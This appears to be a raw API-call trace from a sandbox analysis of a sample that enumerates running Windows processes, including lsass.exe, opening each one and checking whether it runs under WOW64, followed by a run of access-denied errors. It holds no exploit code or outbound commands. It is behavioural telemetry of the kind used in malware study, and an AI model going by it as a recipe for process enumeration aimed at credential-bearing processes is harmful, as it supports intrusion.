	[0127.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.545] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.545] CloseHandle (hObject=0x2dc) returned 1
	[0127.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.547] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.547] CloseHandle (hObject=0x2dc) returned 1
	[0127.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.548] CloseHandle (hObject=0x2dc) returned 1
	[0127.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.548] CloseHandle (hObject=0x2dc) returned 1
	[0127.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.548] CloseHandle (hObject=0x2dc) returned 1
	[0127.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.549] CloseHandle (hObject=0x2dc) returned 1
	[0127.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.549] CloseHandle (hObject=0x2dc) returned 1
	[0127.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.550] CloseHandle (hObject=0x2dc) returned 1
	[0127.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.550] CloseHandle (hObject=0x2dc) returned 1
	[0127.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.551] CloseHandle (hObject=0x2dc) returned 1
	[0127.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.551] CloseHandle (hObject=0x2dc) returned 1
	[0127.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.552] CloseHandle (hObject=0x2dc) returned 1
	[0127.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.552] CloseHandle (hObject=0x2dc) returned 1
	[0127.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.552] CloseHandle (hObject=0x2dc) returned 1
	[0127.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.553] CloseHandle (hObject=0x2dc) returned 1
	[0127.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.553] CloseHandle (hObject=0x2dc) returned 1
	[0127.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.554] CloseHandle (hObject=0x2dc) returned 1
	[0127.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.554] CloseHandle (hObject=0x2dc) returned 1
	[0127.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.555] CloseHandle (hObject=0x2dc) returned 1
	[0127.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.555] CloseHandle (hObject=0x2dc) returned 1
	[0127.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.556] CloseHandle (hObject=0x2dc) returned 1
	[0127.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.556] CloseHandle (hObject=0x2dc) returned 1
	[0127.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.556] CloseHandle (hObject=0x2dc) returned 1
	[0127.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.557] CloseHandle (hObject=0x2dc) returned 1
	[0127.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.557] CloseHandle (hObject=0x2dc) returned 1
	[0127.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.558] CloseHandle (hObject=0x2dc) returned 1
	[0127.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.558] CloseHandle (hObject=0x2dc) returned 1
	[0127.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.559] CloseHandle (hObject=0x2dc) returned 1
	[0127.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.559] CloseHandle (hObject=0x2dc) returned 1
	[0127.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.559] CloseHandle (hObject=0x2dc) returned 1
	[0127.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.560] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetLastError () returned 0x5
	[0127.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.561] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.561] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
	[0127.562] GetLastError () returned 0x5
